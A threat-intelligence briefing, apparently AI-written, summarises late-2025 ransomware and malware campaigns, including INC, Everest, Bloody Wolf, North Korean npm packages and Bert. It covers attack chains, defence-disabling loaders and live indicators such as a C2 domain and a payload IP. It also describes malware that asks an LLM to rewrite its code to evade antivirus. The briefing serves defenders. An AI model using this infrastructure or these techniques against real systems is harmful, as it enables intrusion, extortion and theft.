Ongoing campaigns from established actors have escalated, targeting critical public safety infrastructure, major retail brands, and leveraging AI for evasion.

Below is a detailed technical breakdown of the most significant active threats reported in the last 72 hours, as I track the events and technical details for you.

🚨 INC Ransomware: Crippling Public Safety

Target: OnSolve CodeRED (Emergency Notification System) Date: Early November 2025 Attribution: INC Ransomware Gang (RaaS)

The INC Ransom gang successfully compromised the legacy environment of the OnSolve CodeRED platform, a critical tool used by US public safety agencies for emergency alerts (weather, evacuation, missing persons). The attack forced a complete decommission of the legacy environment.

Tactics, Techniques, & Procedures (TTPs)

• Initial Access: INC Ransom is known to exploit public-facing vulnerabilities (such as Citrix NetScaler CVE-2023-3519) or use valid credentials obtained via spear-phishing.
• Lateral Movement: The group heavily utilizes Living-off-the-Land (LotL) techniques to blend in.
  • Tools: wmic.exe and PSExec (often renamed to disguise activity, e.g., winupd.exe).
  • Persistence: Deployment of remote management tools to maintain access.
• Extortion: A “Double Extortion” model is used. They encrypt data and threaten to leak exfiltrated PII. In this case, 1.15 TB of data (names, addresses, phone numbers) was stolen.

Indicators of Compromise (IOCs)

• Targeted Assets: Legacy CodeRED infrastructure.
• Malware Behavior: Termination of database processes (SQL, Oracle) prior to encryption to ensure file locking.
• Ransom Note: Files renamed with .inc extension (or similar variants).

👟 Everest Ransomware: The Under Armour Breach

Target: Under Armour (Sportswear) Date: November 18, 2025 Attribution: Everest Ransomware Group

The Everest group listed Under Armour on their data leak site, claiming to have exfiltrated 343 GB of sensitive internal data. This group typically acts as an Initial Access Broker (IAB) but conducts its own extortion campaigns.

Tactics, Techniques, & Procedures (TTPs)

• Initial Access: Often accomplished via compromised remote access credentials (RDP/VPN) or exploited unpatched web servers.
• Exfiltration: Data is compressed and exfiltrated before any encryption attempts.
• Communication: The group demands communication via Tox Messenger within a strict deadline (7 days) to prevent data publication.
• Payment: Uniquely prefers Monero (XMR) to maximize anonymity, unlike many groups still accepting Bitcoin.

Indicators of Compromise (IOCs)

• Data Staging: Presence of large encrypted archives (7z/rar) in root directories.
• Network: Traffic to known file-sharing sites (MEGA, SendSpace) used for exfiltration.

🐺 Bloody Wolf: Targeting Central Asia

Target: Government & Finance Sectors (Kyrgyzstan, Uzbekistan) Date: Late November 2025 (Active since June 2025) Attribution: “Bloody Wolf” Threat Actor

Security researchers at Group-IB identified this actor running a sustained campaign impersonating the Ministry of Justice in Kyrgyzstan and Uzbekistan.

Tactics, Techniques, & Procedures (TTPs)

• Delivery: Spear-phishing emails containing PDFs disguised as official documents.
• Execution Chain:
  1. User clicks a link in the PDF.
  2. A malicious Java Archive (JAR) file is downloaded.
  3. The JAR acts as a downloader for the final payload.
• Payload: NetSupport RAT (specifically an older 2013 version). This legitimate remote admin tool is weaponized to grant attackers full control while bypassing some AV detection.
• Geofencing: The attack infrastructure checks the victim’s IP. If it is outside the target country (e.g., Uzbekistan), the user is redirected to a legitimate government site (data.egov.uz) to hide malicious intent.

Indicators of Compromise (IOCs)

• File Type: Malicious .jar files in user Downloads.
• Network: HTTP traffic fetching NetSupport binaries from non-official domains.
• Persistence: Registry keys added to HKCU\Software\Microsoft\Windows\CurrentVersion\Run.

🇰🇵 North Korean Supply Chain: “Contagious Interview”

Target: Developers / Crypto Sector Date: Late November 2025 Attribution: North Korean State-Sponsored Actors (Lazarus Cluster)

This ongoing campaign involves flooding the npm open-source registry with malicious packages. 197 new packages were recently identified.

Tactics, Techniques, & Procedures (TTPs)

• Vector: Typosquatting and social engineering. Attackers pose as recruiters inviting developers to coding interviews, tricking them into downloading malicious npm packages (e.g., node-nvm-ssh).
• Malware: OtterCookie. A sophisticated RAT/Loader.
• Behavior:
  • Profiles the victim’s machine (OS, user privileges).
  • Connects to C2 to fetch secondary payloads (often BeaverTail or InvisibleFerret).
  • Specifically targets cryptocurrency wallet data and browser extensions (MetaMask).

Indicators of Compromise (IOCs)

• C2 Domain: tetrismic.vercel[.]app (Hardcoded Vercel app used for fetching commands).
• Files: Presence of hidden directories or files matching wallet names (.wallet, metamask) being staged for upload.

🤖 AI-Powered Malware: PROMPTFLUX & PROMPTLOCK

Date: November 2025 Discovery: Google Threat Intelligence Group (GTIG)

A significant shift in malware development capabilities, leveraging Large Language Models (LLMs) for dynamic evasion.

PROMPTFLUX

• Type: VBScript-based backdoor.
• AI Integration: Features a “Thinking Robot” module. It sends the malware’s own code to the Gemini API (using a stolen/hardcoded API key) and asks the AI to obfuscate or rewrite the code to evade antivirus signatures.
• Persistence: The newly rewritten code is saved and executed, changing the file hash constantly.

PROMPTLOCK

• Type: Ransomware (Lua-based).
• Target: Cross-platform (Windows, Linux, macOS).
• AI Integration: Uses LLMs to generate malicious scripts on-the-fly for specific encryption tasks or environment checks.

📅 Significant Groups (Previous Quarter Spotlight)

Bert Ransomware (Water Pombero)

• First Sighting: April 2025.
• Targets: Healthcare/Tech in Asia & Europe.
• Key TTP: Uses a PowerShell loader (start.ps1) to disable Windows Defender and UAC before fetching the payload from 185.100.157[.]74.
• Encryption: Windows variant uses standard AES; Linux variant uses 50 threads for rapid encryption.

RansomHub

• Status: The dominant successor to ALPHV/BlackCat.
• Model: Highly aggressive Affiliate program with a 90/10 split favoring affiliates.
• Key TTP: Exploits Zerologon (CVE-2020-1472) for privilege escalation and recruits former ALPHV affiliates to scale operations quickly.